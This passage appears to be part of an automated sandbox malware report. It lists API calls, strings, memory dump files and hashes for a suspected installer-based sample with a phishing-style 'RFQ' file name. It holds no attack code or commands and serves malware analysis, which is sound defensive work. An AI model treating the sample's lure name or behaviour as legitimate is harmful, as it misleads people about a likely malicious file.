                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 3585118688-0
                                                                    • Opcode ID: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                                                    • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                                    • Opcode Fuzzy Hash: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                                                    • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00402D9D
                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00402DE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                    • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                                                    • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                    • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                                                    APIs
                                                                    • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: TextWindow
                                                                    • String ID: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"$1033
                                                                    • API String ID: 530164218-235812920
                                                                    • Opcode ID: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                                    • Instruction ID: a3bd2acee85f271d60691375da4bc4fc24ae93d70a97cc42eb68c8ddca864a14
                                                                    • Opcode Fuzzy Hash: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                                    • Instruction Fuzzy Hash: C311F631B40611EBC7349F15DC809777BBCEB45719718857FE801A73A2CA39AD038A68
                                                                    APIs
                                                                      • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                      • Part of subcall function 00405A79: CharNextW.USER32(?,?,00424EF0,?,00405AED,00424EF0,00424EF0,75C43420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75C43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                      • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                      • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                    • lstrlenW.KERNEL32(00424EF0,00000000,00424EF0,00424EF0,75C43420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75C43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                                                    • GetFileAttributesW.KERNEL32(00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00000000,00424EF0,00424EF0,75C43420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75C43420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AD6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 3248276644-3355392842
                                                                    • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                    • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                                                    • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                    • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0040511C
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                                      • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                    • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                                    • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                    • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                    • CloseHandle.KERNEL32(?), ref: 00405730
                                                                    Strings
                                                                    • Error launching installer, xrefs: 0040570D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                    • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                                    • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                    • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000000B,?), ref: 00402A36
                                                                    • InvalidateRect.USER32(?), ref: 00402A46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateMessageRectSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 909852535-2153329232
                                                                    • Opcode ID: 3e2961815588af2ded79425beba0fb08c488b6c7a93fa953e87e483052fceec8
                                                                    • Instruction ID: 16da0b38ed55193637b24288223d6ef15c802e427b401645bca05b51af9c9483
                                                                    • Opcode Fuzzy Hash: 3e2961815588af2ded79425beba0fb08c488b6c7a93fa953e87e483052fceec8
                                                                    • Instruction Fuzzy Hash: C6E046B2B00004BFDB20CBA4EC849AEB7B9EB80355B10847AF202A10A0D3345D01DA38
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,75C43420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                                                    • GlobalFree.KERNEL32(?), ref: 004037EF
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Free$GlobalLibrary
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 1100898210-3355392842
                                                                    • Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                    • Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
                                                                    • Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                    • Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405A20
                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405A30
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 2709904686-3370423016
                                                                    • Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                    • Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
                                                                    • Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                    • Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9
                                                                    APIs
                                                                    • SendMessageW.USER32(00000408,?,00000000,00403D14), ref: 004040D5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: `7~v0}$x
                                                                    • API String ID: 3850602802-2625865434
                                                                    • Opcode ID: 8c62ed3701929f089eee80cf20f2bc821b5c1c602f9c32056662057925d6695c
                                                                    • Instruction ID: 8f4742149faf644d9288b83943025539f1755d3edbceae6bb37026368d871f48
                                                                    • Opcode Fuzzy Hash: 8c62ed3701929f089eee80cf20f2bc821b5c1c602f9c32056662057925d6695c
                                                                    • Instruction Fuzzy Hash: D6C01271645201FADB204B00EE00B2A7A20BBA8702F208839F340220F086325823DB1E
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                    • GlobalFree.KERNEL32(?), ref: 10001203
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 1780285237-0
                                                                    • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                    • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                    • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                    • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                                    • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
